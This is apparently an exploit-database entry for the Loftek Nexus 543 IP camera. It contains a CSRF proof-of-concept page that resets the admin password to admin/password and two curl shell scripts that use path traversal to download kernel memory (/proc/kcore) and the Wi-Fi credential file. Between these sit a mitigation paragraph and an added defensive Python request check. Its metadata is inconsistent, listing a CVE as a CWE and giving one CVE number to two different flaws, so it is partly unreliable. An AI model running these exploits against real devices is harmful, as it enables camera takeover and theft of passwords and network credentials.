Vendor: Nexus 543 IP Camera
By: Independent Security Researcher
CVSS: 7,5 (HIGH)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: Nexus 543 IP Camera
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2013-3311
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Loftek Nexus 543 CSRF PoC

This exploit allows an attacker to reset the admin password of a Loftek Nexus 543 IP camera by causing a maliciously crafted HTTP request to be sent to the camera's set_users.cgi endpoint. It was discovered by an independent security researcher in 2013 and was assigned CVE-2013-3311.

Mitigation:

The best way to mitigate CSRF attacks is to use a combination of security measures such as same-site cookies, anti-CSRF tokens, and origin header checks.
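
An added example, not from the original advisory or the vendor's firmware: a Python request check that combines the three measures named above and applies them to the set_users.cgi request from the PoC. The cookie-based session, the csrf_token form field, the device origin 192.0.2.10, the key and the session id are assumptions constructed for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
STATE_CHANGING_PATHS = {"/set_users.cgi"}   # endpoint named in the PoC
OWN_ORIGIN = "http://192.0.2.10"            # constructed: the device's own origin
KEY = b"constructed-per-device-secret"      # constructed: server-side secret
SID = "constructed-session-id"              # constructed: logged-in session id

def session_cookie(session_id):
    # SameSite=Strict keeps the browser from attaching the cookie to
    # requests that another site triggers (such as an <IMG> load).
    return f"session={session_id}; HttpOnly; SameSite=Strict; Path=/"

def issue_token(session_id, key=KEY):
    # Anti-CSRF token bound to the session; embedded in the device's own forms.
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()

def check_request(method, path, headers, form, session_id, key=KEY):
    """Return (allowed, reason) for one request. Header names are assumed
    to be normalised to the capitalisation used here."""
    if path not in STATE_CHANGING_PATHS:
        return True, "not state-changing"
    if method.upper() in SAFE_METHODS:
        return False, "state change over safe method"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "missing Origin/Referer"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != OWN_ORIGIN:
        return False, "cross-origin request"
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, issue_token(session_id, key).encode()):
        return False, "bad CSRF token"
    return True, "ok"

if __name__ == "__main__":
    # Constructed requests: the PoC's image load, then a legitimate form post.
    poc = check_request("GET", "/set_users.cgi",
                        {"Referer": "http://attacker.example/poc.html"}, {}, SID)
    good = check_request("POST", "/set_users.cgi", {"Origin": OWN_ORIGIN},
                         {"csrf_token": issue_token(SID)}, SID)
    print(poc, good)
```

The image-tag request from the PoC is refused at the first check because it tries to change users over GET; the origin and token checks cover a cross-site form POST.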

Exploit-DB raw data:

CSRF:

<HTML><TITLE>Loftek Nexus 543 CSRF PoC</TITLE>
<IMG SRC="http://ip-camera-address/set_users.cgi?next_url=rebootme.htm&user1=admin&pwd1=password&pri1=2&user2=anon&pwd2=password&pri2=0&user3=&pwd3=&pri3=1&user4=&pwd4=&pri4=0&user5=&pwd5=&pri5=0&user6=&pwd6=&pri6=0&user7=&pwd7=&pri7=0&user8=&pwd8=&pri8=0" ALT="Your password has been reset to admin/password">
</HTML>


Memory Dump:

#!/bin/sh
# This script exploits CVE-2013-3311 to retrieve kernel memory from a Loftek Nexus 543 IP camera
# The file which is downloaded can be analyzed (strings) to recover passwords and other goodies


if [ -n "$1" ] && [ -n "$2" ]; then
	curl "http://$1/../proc/kcore" -o "$2"
	exit
fi
echo "Usage: $0 Nexus-543-IP output_file" 

WiFi Creds:


#!/bin/sh
# This script exploits CVE-2013-3314 to retrieve wifi credentials from a Loftek Nexus 543 IP camera

if [ "$1x" != "x" ]; then
	curl "http://$1/../etc/RT2870STA.dat"
	exit
fi
echo "Usage: $0 Nexus-543-IP"